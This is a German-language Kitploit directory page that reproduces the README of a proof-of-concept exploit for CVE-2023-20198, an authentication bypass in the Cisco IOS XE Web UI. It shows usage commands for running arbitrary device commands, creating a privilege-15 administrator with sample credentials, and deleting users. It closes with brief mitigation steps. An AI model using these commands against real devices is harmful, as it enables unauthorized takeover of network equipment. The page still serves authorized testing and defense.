Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-20198-Exploit — Proof-of-concept-Exploit für CVE-2023-20198, eine Authentifizierungs-Bypass-Schwachstelle, die das Cisco IOS XE Web UI betrifft. | Kitploit
Tools/GitHubGitHub/gill-singh-a/cve-2023-20198-exploit
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubgill-singh-a/cve-2023-20198-exploit

CVE-2023-20198-Exploit

Proof-of-concept-Exploit für CVE-2023-20198, eine Authentifizierungs-Bypass-Schwachstelle, die das Cisco IOS XE Web UI betrifft.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
6vor 6 MonatenNoch nicht geprüft

Cisco IOS XE Authentifizierungsumgehung (CVE-2023-20198)

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2023-20198, eine Schwachstelle zur Authentifizierungsumgehung, die das Cisco IOS XE Web UI betrifft.

Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, über manipulierte SOAP-Anforderungen beliebige Befehle auf anfälligen Cisco-Geräten auszuführen, was potenziell zu einer vollständigen Gerätekompromittierung führen kann, einschließlich entfernter Befehlsausführung und Erstellung/Löschung administrativer Benutzer.

Schwachstellenübersicht

  • CVE: CVE-2023-20198

  • Betroffenes Produkt: Cisco IOS XE (Web UI / WSMA-Schnittstelle)

  • Auswirkungen:

    • Authentifizierungsumgehung
    • Remotebefehlsausführung (RCE)
    • Unberechtigte Benutzererstellung
    • Unberechtigte Benutzerlöschung
  • Angriffsvektor: Netzwerk (HTTP/HTTPS)

  • Erforderliche Berechtigungen: Keine (nicht authentifiziert)

Diese Schwachstelle wird durch eine fehlerhafte Authentifizierungsbehandlung im Web Services Management Agent (WSMA)-Endpunkt verursacht, die es Angreifern ermöglicht, die Authentifizierung durch manipulierte HTTP-Anforderungen zu umgehen.

Voraussetzungen

  • Python 3.x
  • requests
  • colorama

Installieren der Abhängigkeiten:

root@kitploit:~
pip install -r requirements.txt

Verwendung

root@kitploit:~
usage: main.py [-h] -t TARGET [-c] [-C CMD] [-a] [-d] [-u USERNAME] [-p PASSWORD]

Authentifizierungsumgehung-Exploit für Cisco IOS XE-Geräte (CVE-2023-20198)

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Zielgerät mit Cisco IOS XE
  -c, --check           Prüfen, ob das Ziel anfällig für CVE-2023-20198 ist
  -C CMD, --cmd CMD     Auszuführender Cisco IOS XE-Befehl
  -a, --add             Neuen Benutzernamen und Passwort hinzufügen
  -d, --delete          Vorhandenen Benutzer löschen
  -u USERNAME, --username USERNAME
                        Benutzername für die Kontoerstellung
  -p PASSWORD, --password PASSWORD
                        Passwort für die Kontoerstellung (zufälliges Passwort, falls nicht angegeben)

Verwendung

Befehlszeilenoptionen

Schwachstellenprüfung

Prüfen, ob das Ziel anfällig ist:

root@kitploit:~
python3 exploit.py -t https://<ZIEL-IP> -c

Schwachstellenprüfung

Bei Anfälligkeit erkennt das Tool automatisch den ausnutzbaren WSMA-Endpunkt und zeigt Gerätedetails an.

Remotebefehlsausführung

Ausführen von Befehlen auf dem anfälligen Gerät:

root@kitploit:~
python3 exploit.py -t https://<ZIEL-IP> -C "<BEFEHL>"

Beispiel:

root@kitploit:~
python3 exploit.py -t https://<ZIEL-IP> -C "show running | include username"

Exploit

Administrativen Benutzer hinzufügen

Erstellen eines neuen Admin-Benutzers mit Privilegstufe 15:

root@kitploit:~
python3 exploit.py -t https://<ZIEL-IP> -a -u cisco -p kaptaan

Kontoerstellung

Wenn kein Passwort angegeben wird, generiert das Skript automatisch ein zufälliges sicheres Passwort.

Zugriff auf die Weboberfläche

Mit dem neu erstellten Konto können Sie auf die Weboberfläche des Geräts zugreifen

Weboberfläche

Vorhandenen Benutzer löschen

Löschen eines vorhandenen Benutzers:

root@kitploit:~
python3 exploit.py -t https://<ZIEL-IP> -d -u cisco

Kontolöschung

Erkennung & Abhilfe

  • Aktualisieren Sie Cisco IOS XE auf die neueste gepatchte Version

  • Deaktivieren Sie das Web UI, falls nicht erforderlich:

    root@kitploit:~
    no ip http server
    no ip http secure-server
    
  • Beschränken Sie den Verwaltungszugriff über ACLs

Referenzen

  • Cisco Advisory — CVE-2023-20198
  • NVD: CVE-2023-20198
  • Cisco IOS XE WSMA-Dokumentation
  • Berichte der Sicherheitsforschungsgemeinschaft
Tool herunterladen
OptionBeschreibung
-t, --targetZielgerät mit Cisco IOS XE (erforderlich)
-c, --checkPrüfen, ob das Ziel anfällig ist
-C, --cmdEinen Cisco IOS XE-Befehl ausführen
-a, --addNeuen administrativen Benutzer hinzufügen
-d, --deleteVorhandenen Benutzer löschen
-u, --usernameBenutzername für die Kontoerstellung/-löschung
-p, --passwordPasswort für das neue Konto (zufällig, falls nicht angegeben)